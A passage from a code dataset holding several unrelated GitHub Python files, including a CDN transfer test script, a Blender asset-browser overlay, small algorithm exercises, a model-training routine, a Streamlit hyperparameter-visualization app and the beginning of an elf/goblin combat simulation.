maxBitRate=\"4484982\" duration=\"8859\" contentSize=\"4961111320\" supportFileSize=\"2312247430\" md5Checksum=\"a339212f44f9647b8abfcf312f470c84\"/><Output subID=\"7500033\" state=\"Complete\" percentComplete=\"100\" reasonCode=\"200\"/></TransferStatus>\"\"\"\n test_xml_str1 = test_xml_str.replace('amp;', '')\n test_xml_bytes = test_xml_str1.encode(encoding='utf-8')\n if int(sys.argv[1]) == 1: # 注入\n s_code = RequestCDN.transfer_content(test_xml_bytes)\n if s_code == 200:\n print('insert good')\n else:\n print('failed, {}'.format(s_code))\n elif int(sys.argv[1]) == 2: # 状态查询\n status_bytes = xml_parser.XmlParser.get_query_str(test_xml_str.encode(encoding='utf-8'), 'GetTransferStatus', 0)\n s_code, re_xml = RequestCDN.get_transfer_status(status_bytes)\n if s_code == 200:\n print(re_xml)\n else:\n print('query failed')\n elif int(sys.argv[1]) == 3:\n status_bytes = xml_parser.XmlParser.get_query_str(test_xml_str.encode(encoding='utf-8'), 'CancelTransfer', 404)\n s_code = RequestCDN.cancel_transfer(status_bytes)\n if s_code == 200:\n print('cancel good')\n else:\n print('failed, {}'.format(s_code))\n elif int(sys.argv[1]) == 4:\n status_bytes = xml_parser.XmlParser.get_query_str(test_xml_str.encode(encoding='utf-8'), 'DeleteContent', 201)\n s_code = RequestCDN.delete_content(status_bytes)\n if s_code == 200:\n print('delete good')\n else:\n print('failed, {}'.format(s_code))\n elif int(sys.argv[1]) == 5:\n s_code = test_server_post(trans_st_str)\n if s_code == 200:\n print('post good')\n else:\n print('failed, {}'.format(s_code))\n elif int(sys.argv[1]) == 6:\n start_time = time.time()\n status_bytes = xml_parser.XmlParser.get_query_str(test_xml_str.encode(encoding='utf-8'),\n 'GetTransferStatus', 0)\n for i in range(0, 1000):\n s_code, re_xml = RequestCDN.get_transfer_status(status_bytes)\n if s_code == 200:\n print(re_xml)\n else:\n print('query failed')\n end_time = time.time()\n print('used time is <{}>'.format(end_time - 
start_time))\n","repo_name":"Achillesxu/cds_auto_import","sub_path":"CDS_Auto_Import_tools/request_shuma_cdn.py","file_name":"request_shuma_cdn.py","file_ext":"py","file_size_in_byte":7804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8987947690","text":"import math\nimport time\n\nimport bpy\nimport blf\nimport bgl\nimport gpu\n\nfrom gpu_extras.batch import batch_for_shader\nfrom mathutils import Vector\n\nfrom .utils import asset_match_filter\nfrom .thumbnails import get_thumbnail\n\n#\n# Drawing utils.\n#\n\nimage_2d_fragment_shader = \"\"\"\n in vec2 texCoord_interp;\n out vec4 fragColor;\n uniform sampler2D image;\n\n void main()\n {\n fragColor = pow(texture(image, texCoord_interp), vec4(2.2));\n }\n\n\"\"\"\n\nUNIFORM_SHADER_2D = gpu.shader.from_builtin(\"2D_UNIFORM_COLOR\")\nIMAGE_SHADER_2D = gpu.types.GPUShader(\n gpu.shader.code_from_builtin(\"2D_IMAGE\")[\"vertex_shader\"], image_2d_fragment_shader\n)\n\n\ndef draw_square(position, width, height, color):\n vertices = (\n (position.x, position.y),\n (position.x + width, position.y),\n (position.x, position.y + height),\n (position.x + width, position.y + height),\n )\n indices = ((0, 1, 2), (2, 1, 3))\n\n batch = batch_for_shader(UNIFORM_SHADER_2D, \"TRIS\", {\"pos\": vertices}, indices=indices)\n\n UNIFORM_SHADER_2D.bind()\n UNIFORM_SHADER_2D.uniform_float(\"color\", color)\n batch.draw(UNIFORM_SHADER_2D)\n\n\ndef draw_image(position, width, height, textureid):\n vertices = (\n (position.x, position.y),\n (position.x + width, position.y),\n (position.x, position.y + height),\n (position.x + width, position.y + height),\n )\n indices = ((0, 1, 2), (2, 1, 3))\n\n batch = batch_for_shader(\n IMAGE_SHADER_2D, \"TRIS\", {\"pos\": vertices, \"texCoord\": ((0, 0), (1, 0), (0, 1), (1, 1))}, indices=indices,\n )\n\n bgl.glActiveTexture(bgl.GL_TEXTURE0)\n bgl.glBindTexture(bgl.GL_TEXTURE_2D, textureid)\n IMAGE_SHADER_2D.bind()\n IMAGE_SHADER_2D.uniform_int(\"image\", 0)\n batch.draw(IMAGE_SHADER_2D)\n\n\nclass GlTexture:\n def __init__(self, image_preview):\n width, height = image_preview.image_size\n self._texture_id = bgl.Buffer(bgl.GL_INT, 1)\n self.pixel_buffer = bgl.Buffer(bgl.GL_FLOAT, width * height * 4, list(image_preview.image_pixels_float))\n\n bgl.glGenTextures(1, self._texture_id)\n bgl.glBindTexture(bgl.GL_TEXTURE_2D, self._texture_id[0])\n bgl.glTexImage2D(\n bgl.GL_TEXTURE_2D, 0, bgl.GL_RGB, width, height, 0, bgl.GL_RGBA, bgl.GL_FLOAT, self.pixel_buffer,\n )\n\n bgl.glTexParameteri(bgl.GL_TEXTURE_2D, bgl.GL_TEXTURE_MIN_FILTER, bgl.GL_LINEAR)\n bgl.glTexParameteri(bgl.GL_TEXTURE_2D, bgl.GL_TEXTURE_MAG_FILTER, bgl.GL_LINEAR)\n\n def __del__(self):\n bgl.glDeleteTextures(1, self._texture_id)\n\n @property\n def texture_id(self):\n return self._texture_id[0]\n\n\n#\n# Misc\n#\ndef get_region_at_xy(context, x, y):\n \"\"\"\n Does not support quadview right now\n\n :param context:\n :param x:\n :param y:\n :return: the region and the area containing this region\n \"\"\"\n for area in context.screen.areas:\n if area.type != \"VIEW_3D\":\n continue\n # is_quadview = len ( area.spaces.active.region_quadviews ) == 0\n i = -1\n for region in area.regions:\n if region.type == \"WINDOW\":\n i += 1\n if region.x <= x < region.width + region.x and region.y <= y < region.height + region.y:\n\n return region, area\n\n return None, None\n\n\nclass BlWidget:\n def __init__(self, context, parent=None):\n self._context = context\n self._parent = parent\n self._position = 
Vector((0, 0)) # Relative Position from parent\n self._height = 0.0\n self._width = 0.0\n\n @property\n def context(self):\n return self._context\n\n @property\n def parent(self) -> \"BlWidget\":\n return self._parent\n\n @property\n def absolute_position(self):\n parent_pos = Vector((0, 0)) if self._parent is None else self.parent.absolute_position\n return parent_pos + self.position\n\n @property\n def position(self) -> Vector:\n return self._position\n\n @position.setter\n def position(self, value: Vector):\n self._position = value\n\n @property\n def width(self):\n return self._width\n\n @width.setter\n def width(self, value):\n self._width = value\n\n @property\n def height(self):\n return self._height\n\n @height.setter\n def height(self, value):\n self._height = value\n\n @property\n def bbox(self):\n return (\n Vector([self.position.x, self.position.y]),\n Vector([self.position.x + self.width, self.position.y + self.height]),\n )\n\n @property\n def absolute_bbox(self):\n my_low, my_high = self.bbox\n if self.parent is not None:\n my_low += self.parent.absolute_position\n my_high += self.parent.absolute_position\n\n return my_low, my_high\n\n def is_inside(self, x, y):\n low, high = self.absolute_bbox\n if low.x <= x < high.x and low.y <= y < high.y:\n return True\n\n return False\n\n def handle_event(self, event) -> bool:\n \"\"\"\n Return True if you want the event to be processed by other widgets.\n :param event:\n :return:\n \"\"\"\n return False\n\n def draw(self):\n pass\n\n\nclass AssetThumbnail(BlWidget):\n def __init__(self, index, asset, context, parent=None):\n BlWidget.__init__(self, context, parent)\n self.asset = asset\n self.texture = GlTexture(get_thumbnail(self.asset))\n self.show_tooltip = False\n self._prev_click = 0\n self.index = index\n\n def handle_event(self, event) -> bool:\n props = self.context.window_manager.uas_asset_bank\n self.show_tooltip = False\n region, _area = get_region_at_xy(self.context, event.mouse_x, event.mouse_y)\n mouse_x = event.mouse_x - region.x\n mouse_y = event.mouse_y - region.y\n\n if self.is_inside(mouse_x, mouse_y):\n self.show_tooltip = True\n if event.type == \"LEFTMOUSE\" and event.value == \"PRESS\":\n counter = time.perf_counter()\n props.selected_index = self.index\n if counter - self._prev_click < 0.2:\n bpy.ops.uas.asset_bank_import(\n append=False, location=self.context.scene.cursor.location, index=self.index,\n )\n self._prev_click = counter\n return True\n\n return False\n\n def draw(self):\n draw_image(self.position, self.width, self.height, self.texture.texture_id)\n if self.show_tooltip:\n p = self.absolute_position\n vertices = (\n (p.x, p.y),\n (p.x + self.width, p.y + 20),\n (p.x, p.y + 20),\n (p.x + self.width, p.y),\n )\n indices = ((0, 1, 2), (0, 1, 3))\n\n batch = batch_for_shader(UNIFORM_SHADER_2D, \"TRIS\", {\"pos\": vertices}, indices=indices)\n\n UNIFORM_SHADER_2D.bind()\n UNIFORM_SHADER_2D.uniform_float(\"color\", [0, 0, 0, 1])\n batch.draw(UNIFORM_SHADER_2D)\n\n blf.color(0, 0.99, 0.99, 0.99, 1)\n blf.size(0, 11, 72)\n text_width, text_height = blf.dimensions(0, self.asset.data_name)\n posx = (self.width - text_width) * 0.5 + self.absolute_position.x\n blf.position(0, posx, 8, 0)\n blf.draw(0, self.asset.data_name)\n\n\nclass AssetBrowser(BlWidget):\n def __init__(self, context, parent=None):\n BlWidget.__init__(self, context, parent)\n self.item_per_page = 10\n self.current_page = 0\n self.max_page = self.current_page\n self.asset_thumbnails = list()\n\n self.paddingx = 2\n self.height = 150\n 
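# added comment: overall strip width allows one square thumbnail per visible item plus padding\n        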
self.width = self.item_per_page * (self.height + self.paddingx) + self.paddingx\n self.filter_name = self.context.window_manager.uas_asset_bank.filter_name\n\n self.load_page()\n\n def load_page(self):\n self.asset_thumbnails = list()\n props = self.context.window_manager.uas_asset_bank\n assets = [(i, a) for i, a in enumerate(props.assets)]\n assets.sort(key=lambda a: a[1].data_name.lower())\n if props.filter_name != \"\":\n assets = [a for a in assets if asset_match_filter(a[1], props.filter_name.strip().lower().split(), 1)]\n\n self.max_page = math.floor(len(assets) / self.item_per_page)\n self.current_page = max(0, self.current_page)\n self.current_page = min(self.max_page, self.current_page)\n start = min(self.current_page * self.item_per_page, len(assets))\n end = min(start + self.item_per_page, len(assets))\n\n assets_to_show = assets[start:end]\n posx = self.paddingx\n for index, asset in assets_to_show:\n at = AssetThumbnail(index, asset, self.context, self)\n at.width = self.height\n at.height = self.height - 4\n at.position.x = posx\n at.position.y = 2\n posx += self.height + 2\n self.asset_thumbnails.append(at)\n\n self.width = len(assets_to_show) * (self.height + self.paddingx) + self.paddingx\n\n def handle_event(self, event) -> bool:\n props = self.context.window_manager.uas_asset_bank\n if self.filter_name != props.filter_name:\n self.filter_name = props.filter_name\n self.current_page = 0\n self.load_page()\n\n region, _area = get_region_at_xy(self.context, event.mouse_x, event.mouse_y)\n mouse_x = event.mouse_x - region.x\n mouse_y = event.mouse_y - region.y\n if self.is_inside(mouse_x, mouse_y):\n if event.type == \"WHEELUPMOUSE\":\n self.current_page -= 1\n self.load_page()\n return True\n elif event.type == \"WHEELDOWNMOUSE\":\n self.current_page += 1\n self.load_page()\n return True\n\n for at in self.asset_thumbnails:\n if at.handle_event(event):\n return True\n\n return False\n\n def draw(self):\n self.height = 150\n draw_square(self.position, self.width, self.height, [0.2, 0.2, 0.2, 0.75])\n for at in self.asset_thumbnails:\n at.draw()\n\n blf.color(0, 0.99, 0.99, 0.99, 1)\n blf.size(0, 11, 72)\n blf.position(0, self.position.x + self.width * 0.5, self.position.y + self.height + 2, 0)\n blf.draw(0, f\"{self.current_page + 1}/{self.max_page + 1}\")\n\n\nclass UAS_AssetBank_ViewportBrowser(bpy.types.Operator):\n bl_idname = \"uas.asset_bank_viewport_browser\"\n bl_label = \"Viewport Browser\"\n\n def __init__(self):\n self.asset_browser = None\n\n self.draw_handle = None\n self.draw_event = None\n\n def modal(self, context, event):\n region, area = get_region_at_xy(context, event.mouse_x, event.mouse_y)\n\n if region is None:\n return {\"PASS_THROUGH\"}\n area.tag_redraw()\n\n if self.asset_browser.handle_event(event):\n return {\"RUNNING_MODAL\"}\n\n if context.window_manager.uas_asset_bank.toggle_overlay is False:\n context.window_manager.event_timer_remove(self.draw_event)\n bpy.types.SpaceView3D.draw_handler_remove(self.draw_handle, \"WINDOW\")\n return {\"CANCELLED\"}\n\n return {\"PASS_THROUGH\"}\n\n def invoke(self, context, event):\n self.asset_browser = AssetBrowser(context)\n self.draw_handle = bpy.types.SpaceView3D.draw_handler_add(self.draw, (context,), \"WINDOW\", \"POST_PIXEL\")\n self.draw_event = context.window_manager.event_timer_add(0.1, window=context.window)\n context.window_manager.modal_handler_add(self)\n return {\"RUNNING_MODAL\"}\n\n def draw(self, context):\n self.asset_browser.draw()\n\n\n_classes = (UAS_AssetBank_ViewportBrowser,)\n\n\ndef 
register():\n    for cls in _classes:\n        bpy.utils.register_class(cls)\n\n\ndef unregister():\n    for cls in reversed(_classes):\n        bpy.utils.unregister_class(cls)\n","repo_name":"ubisoft/assetbank","sub_path":"uas_assetbank/ogl_browser.py","file_name":"ogl_browser.py","file_ext":"py","file_size_in_byte":11967,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"}
{"seq_id":"6232239063","text":"\"\"\"\nDefinition of ListNode\nclass ListNode(object):\n\n    def __init__(self, val, next=None):\n        self.val = val\n        self.next = next\n\"\"\"\n\n\nclass Solution:\n    \"\"\"\n    @param head: The first node of linked list.\n    @param n: An integer.\n    @return: Nth to last node of a singly linked list.\n    \"\"\"\n\n    def nthToLast(self, head, n):\n        # write your code here\n        p1 = head\n        for i in range(0, n):\n            p1 = p1.next\n\n        p2 = head\n\n        while p1 is not None:\n            p1 = p1.next\n            p2 = p2.next\n\n        return p2\n","repo_name":"duoertai/LintCodePython","sub_path":"NthtoLastNodeinList/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"2064745867","text":"\n\n\n\n\n'''(Sliding Window using Two Pointers [E]): Given an array of positive integers, \nfind the contiguous subarray that sums to a given number X.\nFor example, input = [1,2,3,5,2] and X=8, Result = [3,5]'''\n\ndef findSubSum(arr, x):\n    \n    start, end = 0, 0\n    windowSum = arr[0]\n\n    while start <= len(arr) - 1:\n        # start inched forward, bring end back to start\n        if start > end:\n            end = start\n            windowSum = arr[start]\n        \n        # expand to the right\n        if windowSum < x:\n            if end == len(arr) - 1:\n                # reached end, cannot expand further\n                break \n\n            end += 1\n            windowSum += arr[end]\n        \n        # contract from left\n        elif windowSum > x:\n            windowSum -= arr[start]\n            start += 1\n        else:\n            return arr[start:end + 1]\n    \n\nprint(findSubSum([1,2,3,5,2], 8))\n\n\n# Output: [3, 5]\n# Time: O(n) Space: O(1)\n\n\n\n\n\n","repo_name":"mkoryor/Python","sub_path":"subarrays/findSubSum.py","file_name":"findSubSum.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"33137013811","text":"import os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__),'..'))\n\nfrom os.path import isfile\nimport numpy as np\nimport torch\n\nfrom .sensation import Sensation\nfrom .sensation_models import AutoEncoder\nfrom .config import config\n\nfrom TrainBase import TrainBase\nimport sentencepiece as spm\n\nclass Train(TrainBase):\n    MemoryFormat = Sensation.MemoryFormat\n    LogTitle:str = f'train{MemoryFormat}'\n\n    def TrainProcess(self) -> None:\n        # ------ Separator training ------\n        spm.SentencePieceTrainer.Train(f\"--input={Sensation.Corpus_file} --model_prefix=Sensation{Sensation.MemoryFormat}/params/{config.separator_name} --vocab_size={config.vocab_size}\")\n        # --- end of SentencePiece Trainings ---\n        self.release_system_memory()\n\n        # ------ Fasttext training ------\n        separator = spm.SentencePieceProcessor()\n        separator.Load(f'Sensation{Sensation.MemoryFormat}/params/{config.separator_name}.model')\n        bos = separator.IdToPiece(separator.bos_id())\n        eos = separator.IdToPiece(separator.eos_id())\n\n        with open(Sensation.Corpus_file,'r',encoding='utf-8') as f:\n            corpus = f.read().split('\\n')[-Sensation.CorpusUseLength:]\n        words = [[bos,*separator.EncodeAsPieces(i),eos] for i in corpus]\n        FTmodel = 
self.load_python_obj(Sensation.FastText_params)\n FTmodel.build_vocab(words,update=True)\n FTmodel.train(sentences=words,total_examples=len(words),epochs=Sensation.FasttextEpochs)\n self.save_python_obj(Sensation.FastText_params,FTmodel)\n self.log('trained Fasttext')\n # --- end of Fasttext training ---\n\n # ------ AutoEncoder training ------\n data = []\n for i in words:\n vector = torch.from_numpy(np.stack([FTmodel.wv[q] for q in i if q in FTmodel.wv])).type(Sensation.Training_dtype)\n length = vector.size(0)\n for idx in range(0,length,config.text_seq_len):\n d = vector[idx:idx+config.text_seq_len]\n if d.size(0) < config.text_seq_len:\n pad = torch.zeros((config.text_seq_len - d.size(0)),d.size(1),dtype=d.dtype,device=d.device)\n d = torch.cat([d,pad])\n data.append(d)\n data = torch.stack(data)\n idx = np.random.permutation(len(data))[:Sensation.AutoEncoderDataSize]\n data = data[idx]\n\n self.log('Text AutoEncoder data shape',data.shape)\n del FTmodel,separator\n self.release_system_memory()\n model = AutoEncoder()\n model.encoder.load_state_dict(torch.load(Sensation.Encoder_params,map_location=self.device))\n model.decoder.load_state_dict(torch.load(Sensation.Decoder_params,map_location=self.device))\n\n # AutoEncoder settings\n criterion = torch.nn.MSELoss()\n optimizer = torch.optim.Adam(model.parameters(),lr=Sensation.AutoEncoderLearningRate)\n epochs = Sensation.AutoEncoderEpochs\n batch_size = Sensation.AutoEncoderBatchSize\n # Train\n self.Train(\n model=model,\n epochs=epochs,\n batch_size=batch_size,\n optimizer=optimizer,\n criterion=criterion,\n device=self.device,\n train_x=data,\n train_y=data\n ) \n torch.save(model.encoder.state_dict(),Sensation.Encoder_params)\n torch.save(model.decoder.state_dict(),Sensation.Decoder_params)\n self.log('trained AutoEncoder')\n del data,model\n self.release_system_memory()\n # --- end of AutoEncoder training ---\n # ----- corpus reducing ------\n with open(Sensation.Corpus_file,'r',encoding='utf-8') as f:\n corpus = f.readlines()[-Sensation.SavingCorpusLength:]\n with open(Sensation.Corpus_file,'w',encoding='utf-8') as f:\n f.writelines(corpus)\n self.log('reduced corpus')\n self.log('Train process was finished')","repo_name":"Geson-anko/JARVIS3","sub_path":"Sensation7/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"14804962460","text":"from collections import defaultdict\nimport os\n\nimport hiplot as hp\nimport pandas as pd\nimport streamlit as st\n\nimport data_management as dm\n\nimport shap\nimport xgboost\n\nimport matplotlib.pyplot as plt\nimport matplotlib\n\nimport numpy as np\n\nimport re\n\nshap.plots._labels.labels['VALUE'] = 'Influence on the optimized column'\n\nst.set_page_config(page_title='HyperViz', layout='wide')\n\n# custom css to make labels more readable\nst.write('''<style>\nlabel {\n font-size: 1rem !important;\n}\ninput[type=\"radio\"] + div {\n font-size: 0.9rem !important;\n}\n</style>''', unsafe_allow_html=True)\n\n@st.cache(allow_output_mutation=True, ttl=3600)\ndef get_cached_experiment(df: pd.DataFrame):\n exp = hp.Experiment.from_dataframe(df)\n exp._compress = True\n exp.colorby = df.columns[0]\n return exp.to_streamlit(key='hiplot')\n\n@st.cache(allow_output_mutation=True, ttl=3600)\ndef calc_shap_summary_plot(df: pd.DataFrame, column_to_optimize, param_columns, cmap):\n\n df = df[[column_to_optimize]+param_columns]\n encoder = {col: {(val if val == val else 'nan'): 
encoded for encoded, val in enumerate(pd.unique(df[col]))} for col in param_columns}\n\n for col in param_columns:\n df[col] = df[col].map(lambda x: (encoder[col][x] if x == x else encoder[col]['nan']))\n\n X, y = df.loc[:,df.columns != column_to_optimize], df[column_to_optimize]\n model = xgboost.train({\"learning_rate\": 0.1}, xgboost.DMatrix(X, label=y), 100)\n explainer = shap.TreeExplainer(model)\n shap_values = explainer.shap_values(X)\n\n order = (-np.mean(np.abs(shap_values), axis=0)).argsort()\n ordered_encoder = {}\n for i in order:\n col = param_columns[i]\n ordered_encoder[col] = encoder[col]\n\n fig = plt.figure()\n\n shap.summary_plot(shap_values, X, cmap=cmap, show=False)\n\n return fig, ordered_encoder\n\n@st.cache(allow_output_mutation=True, ttl=3600)\ndef create_legend(encoder, cmap):\n\n legend = {}\n for col, row in encoder.items():\n for val, encoded in row.items():\n if isinstance(val, float) and val.is_integer():\n val = int(val)\n legend.setdefault(encoded, {})[col] = val\n\n def color_table(row):\n val_count = row.size -row.isna().sum()\n if val_count == 1:\n fractions = [0]\n else:\n fractions = [i/(val_count-1) for i in range(val_count)]\n background_colors = cmap(fractions)\n def get_foreground_color(color):\n if (color[0]*0.299 + color[1]*0.587 + color[2]*0.114) > 0.5:\n return '#000000' \n else:\n return '#ffffff'\n\n css = [f'background-color: {matplotlib.colors.rgb2hex(background_colors[i])}; color: {get_foreground_color(background_colors[i])}' if val == val else 'color: #ffffff' for i, val in enumerate(row)]\n return pd.Series(css)\n\n return pd.DataFrame.from_dict(legend).style.apply(color_table, axis=1)\n\ndef shap_viz(df: pd.DataFrame):\n with st.expander('How does this work?'):\n st.write('Your data is used to train a simple __xgboost-model__, with the \"column to optimize\" as label. This model is trying to __predict the performance__ of your model, based on the parameters. After the training is complete, the __SHAP values__ are calculated, which are used to explain the behaviour of this xgboost model. So, as a result, the SHAP values can be used to __explain the influence of a parameter__ on the performance.')\n \n st.write('#')\n column_to_optimize = st.selectbox('Please select the column to optimze:', df.columns)\n other_colums = [col for col in df.columns if col != column_to_optimize]\n\n param_columns = st.multiselect('Which columns are the parameters to be analyzed?', other_colums, [col for col in other_colums if col.startswith('param_')])\n\n draw = st.checkbox('Auto-refresh the plot?')\n if not draw:\n draw = st.button('Draw plot')\n if draw:\n with st.expander('What can I see here?'):\n st.write(\"For each column you chose above you can see a lot of dots; __one dot for each row__ in your dataset. The __color shows the value__ the dot represents and it's __left-right-position shows the impact__ it has on the selected \\\"column to optimize\\\". Underneath is legend to explain, which color stands for which value.\")\n st.write(\"__Example:__ If a parameter only contains two options, you might see a distinct cluster of gray dots and a distinct cluster of black dots. If the gray cluster is further left than the black one, that means that all runs with the \\\"gray\\\" value performed worse than the others. 
Which value that is, can be read from the legend below the plot.\")\n        cmap = matplotlib.cm.get_cmap('nipy_spectral')\n        shap.plots._labels.labels['VALUE'] = '[SHAP summary plot] Influence on the selected column'\n        fig, encoder = calc_shap_summary_plot(df, column_to_optimize, param_columns, cmap)\n        st.write(fig)\n        legend = create_legend(encoder, cmap)\n        st.write(legend)\n\ndef sidebar():\n    st.sidebar.write('# Select and filter your data here:')\n    models = dm.get_models()\n    project = st.sidebar.selectbox('Select your project', list(models.keys()))\n    if project:\n        models = st.sidebar.multiselect('Select the models to compare:', models[project])\n\n        if not models:\n            return \n\n        data = dm.read_files(project, models)\n\n        # Filters\n\n        st.sidebar.write('### Here you can apply some basic filters before the data is passed to the vizes on the right.')\n        st.sidebar.write('#### This can help if your data is too big to be displayed by the Hiplot component.')\n        st.sidebar.write('####')\n\n        if st.sidebar.checkbox('Remove columns with only one unique value?'):\n            for col in data.columns:\n                if len(data[col].unique()) == 1:\n                    data.drop(col,inplace=True,axis=1)\n\n        col_list = list(data.columns)\n        columns_to_keep = st.sidebar.multiselect('Which columns should be displayed?', col_list, col_list)\n        data = data[columns_to_keep]\n\n        return data\n\ndef center_uploader():\n    st.write('## Upload your files here:')\n    models = dm.get_models()\n    project = st.selectbox('Please select a project:', ['New project']+list(models.keys()))\n    project_valid = True\n    if project == 'New project':\n        project = st.text_input('Please enter a name for the project:')\n        project_valid = not re.search(r'[^A-Za-z0-9_\\-]',project)\n        if not project_valid:\n            st.warning('Project names may only contain alphanumeric characters, _ and -')\n        model = st.text_input('Please name the model:')\n    else:\n        model = st.selectbox('Please select the model:', ['New model']+models[project])\n        if model == 'New model':\n            model = st.text_input('Please name the model:')\n    \n    model_valid = not re.search(r'[^A-Za-z0-9_\\-]',model)\n    if not model_valid:\n        st.warning('Model names may only contain alphanumeric characters, _ and -')\n\n    files = st.file_uploader('Upload your .csv file(s) here. You can upload multiple files, e.g. of different GridSearch runs', accept_multiple_files=True)\n\n    tag = st.text_input('Provide a tag for the uploaded data. This might be a date, a number or any other string:','default')\n\n    delimiter = [';', ','][st.radio('Select the delimiter of the csv file(s):', [0, 1], format_func=lambda x: ['; - Semicolon - GridSearchCV default', ', - Comma - normal CSV'][x])]\n    decimal = ['.', ','][st.radio('Select the decimal point of the csv file(s):', [0, 1], format_func=lambda x: ['. - Dot - English', ', - Comma - German'][x])]\n\n    df = dm.read_files_to_df(files, delimiter, decimal)\n\n    mean_cols = []\n    std_cols = []\n    param_cols = []\n\n    for col in df.columns:\n        if col.startswith('mean_test_'):\n            mean_cols.append(col)\n        elif col.startswith('std_test_'):\n            std_cols.append(col)\n        elif col.startswith('param_'):\n            param_cols.append(col)\n    \n    columns_suggestion = sorted(mean_cols)+sorted(std_cols)+sorted(param_cols)\n    if len(columns_suggestion) == 0:\n        columns_suggestion = list(df.columns)\n\n    columns_to_keep = st.multiselect('Select which columns you want to keep:', list(df.columns), columns_suggestion)\n\n    if st.button('Upload'):\n        if not model_valid or not project_valid:\n            st.warning('Please fix above warnings!')\n        elif len(model) < 1 or len(project) < 1:\n            st.warning('Both project name and model name must not be empty!')\n        elif len(files) < 1:\n            st.warning(\"You haven't uploaded any file!\")\n        elif len(tag) < 1:\n            st.warning('The tag may not be empty!')\n        else:\n            with st.spinner('Processing...'):\n                dm.process_data(df, project, model, tag, columns_to_keep)\n            st.write('<meta http-equiv=\"refresh\" content=\"0\">', unsafe_allow_html=True)\n\ndef center_delete():\n    st.write('## Delete data')\n    st.warning('This action is __irreversible__! Proceed with caution.')\n    models = dm.get_models()\n    project = st.selectbox('Select the project:', list(models.keys()))\n    if st.button('Delete entire project'):\n        if not project:\n            st.warning('No project selected')\n        else:\n            dm.delete_project(project)\n            st.write('<meta http-equiv=\"refresh\" content=\"0\">', unsafe_allow_html=True)\n    if project:\n        models_to_delete = st.multiselect('Select the model(s) to delete:', models[project] if project in models else [])\n        if st.button('Delete selected models'):\n            if len(models_to_delete) == 0:\n                st.warning('No models selected')\n            else:\n                for model in models_to_delete:\n                    dm.delete_model(project, model)\n                st.write('<meta http-equiv=\"refresh\" content=\"0\">', unsafe_allow_html=True)\n    \ndef center_data_management():\n    st.write('The goal of this app is to help with the __easy visualization of hyperparameters__ of machine learning models and their __influence on the performance__ of the model. It was originally developed to display results of the sklearn GridSearchCV method; however, as long as your data can be represented in a __.csv format__, it can be analyzed here. __Simply upload your file and start analyzing.__')\n    st.write('A __project__ can contain multiple __models__, which can be compared against each other.')\n    st.write('A __model__ contains all the data for one model. Should you upload __multiple files__ at once, they will be __concatenated__. Should you want to __compare different files__ for one model, you can upload them one after another, providing __tags__ for different files. 
The data will be appended and the tags will be visible in the analysis once multiple tags have been created.')\n \n center_uploader()\n st.write('#')\n center_delete()\n\ndef center_viz(df):\n ''''''\n '''\n ## Parallel plot\n ### This plot allows you to visualize higher-dimensional data and analyze it at a glance.\n '''\n get_cached_experiment(df).display()\n '''\n #\n ## SHAP\n ### This plot helps you discover more details about the influence of individual parameters on the performance of your model.\n '''\n shap_viz(df)\n\ndef main():\n st.title('HyperViz - Analysing Hyperparameters Made Easy')\n \n data = sidebar()\n if data is not None:\n center_viz(data)\n else:\n center_data_management()\n\nif __name__ == '__main__':\n main()\n","repo_name":"F1nnM/HyperViz","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"28491873520","text":"import time\n\nfrom pages.base.component import Component\n\n\nclass Input(Component):\n \n @property\n def type_of(self) -> str:\n return 'input'\n \n \n def fill(self, value: str, **kwargs):\n element = self.get_presence_element(**kwargs)\n element.click()\n element.clear()\n element.send_keys(value)\n time.sleep(1)\n","repo_name":"RomanAlekseevich/sbis_autotest","sub_path":"pages/base/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16047067209","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nfrom dataclasses import dataclass\nfrom enum import IntEnum, Enum\n\nimport sys\nfrom collections import Counter\nfrom itertools import product\nfrom typing import NamedTuple, Dict, Tuple, Union\nfrom copy import deepcopy\nfrom pprint import PrettyPrinter\n\nINPUT_FILE = \"input.txt\"\n\nELF, GOBLIN, WALL, OPEN_CAVERN = (\"elf\", \"goblin\", \"#\", \".\")\n\npp = PrettyPrinter(indent=4)\n\n\nclass AreaType(Enum):\n WALL = \"#\"\n OPEN_CAVERN = \".\"\n\n\nclass Coordinate(NamedTuple):\n x: int\n y: int\n\n\nclass Area(NamedTuple):\n type: str = \"\"\n\n\n@dataclass\nclass Elf:\n name: str = ELF\n is_attacking: bool = False\n attack_power: int = 3\n hit_points: int = 200\n\n\n@dataclass\nclass Goblin:\n name: str = GOBLIN\n is_attacking: bool = False\n attack_power: int = 3\n hit_points: int = 200\n\n\nvisited_points = set()\ntravel_distances = {} # Counter()\ndirections = [(0, -1), (1, 0), (0, 1), (-1, 0)]\n\n\ndef start_combat(\n area: Dict[Coordinate, Area], units: Dict[Coordinate, Union[Elf, Goblin]]\n):\n round = 0\n while True:\n for starting_coordinate, unit in sorted(\n units.items(), key=lambda item: (item[0][1], item[0][0])\n ):\n print(round)\n new_places = {}\n if isinstance(unit, Goblin):\n targets = {\n coordinate: unit2\n for coordinate, unit2 in units.items()\n if isinstance(unit2, Elf) and unit2.hit_points > 0\n }\n else:\n targets = {\n coordinate: unit2\n for coordinate, unit2 in units.items()\n if isinstance(unit2, Goblin) and unit2.hit_points > 0\n }\n if not targets:\n print(round)\n for key, value in units.items():\n if unit.name == value.name:\n print(value.hit_points)\n return\n in_range_enemies = []\n for end_coordinate, target in targets.items():\n in_range_points = []\n for direction in directions:\n next_point = tuple(sum(x) for x in zip(end_coordinate, direction))\n if next_point in area:\n 